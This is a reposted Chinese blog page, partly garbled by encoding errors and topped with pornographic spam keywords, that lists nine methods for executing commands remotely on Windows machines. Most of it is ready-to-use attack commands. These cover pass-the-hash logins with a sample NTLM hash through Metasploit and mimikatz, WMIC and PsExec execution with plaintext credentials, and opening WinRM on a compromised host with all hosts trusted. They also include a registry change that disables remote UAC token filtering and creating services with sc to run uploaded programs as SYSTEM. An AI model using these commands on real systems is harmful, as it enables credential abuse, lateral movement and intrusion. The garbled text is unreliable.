日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 >

windows 远程执行 cmd 命令的 9 种方法

發(fā)布時間:2024/7/23 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 windows 远程执行 cmd 命令的 9 种方法 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

?

?

一、遠(yuǎn)程執(zhí)行命令方式及對應(yīng)端口:

?

? IPC$+AT 445 ? PSEXEC 445 ? WMI 135 ? Winrm 5985(HTTP)&5986(HTTPS)

?

?

二、9種遠(yuǎn)程執(zhí)行cmd命令的方法:

?

1.WMI執(zhí)行命令方式,無回顯:

wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt"

?

2.使用Hash直接登錄Windows(HASH傳遞)

抓取windows hash值,得到administrator的hash:
598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf調(diào)用payload: use exploit/windows/smb/psexec show options set RHOST 192.168.81.129 set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF set SMBUser Administrator show options run

?

3. mimikatz傳遞hash方式連接+at計劃任務(wù)執(zhí)行命令:

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //傳遞hash dir \\192.168.1.185\c$

?

4.WMIcmd執(zhí)行命令,有回顯:

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"

程序下載地址:
https://github.com/nccgroup/WMIcmd/releases

?

5.Cobalt strkie遠(yuǎn)程執(zhí)行命令與hash傳遞攻擊:

?

6. psexec.exe遠(yuǎn)程執(zhí)行命令

psexec /accepteula //接受許可協(xié)議 sc delete psexesvc psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

?

7.psexec.vbs遠(yuǎn)程執(zhí)行命令

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"

?

8.winrm遠(yuǎn)程執(zhí)行命令

?

//肉機(jī)上面快速啟動winrm服務(wù),并綁定到5985端口: winrm quickconfig -q winrm set winrm/config/Client @{TrustedHosts="*"} netstat -ano|find "5985" //客戶端連接方式: winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all" winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd //UAC問題,修改后,普通管理員登錄后也是高權(quán)限: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

?

9.遠(yuǎn)程命令執(zhí)行sc

//建立ipc連接(參見net use + at)后上傳等待運行的bat或exe程序到目標(biāo)系統(tǒng)上,創(chuàng)建服務(wù)(開啟服務(wù)時會以system 權(quán)限在遠(yuǎn)程系統(tǒng)上執(zhí)行程序):

net use \\192.168.17.138\c$ "admin123" /user:pt007 net use dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ sc \\192.168.17.138 create test binpath= "c:\test.exe" sc \\192.168.17.138 start test sc \\192.168.17.138 del test

?

?

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的windows 远程执行 cmd 命令的 9 种方法的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。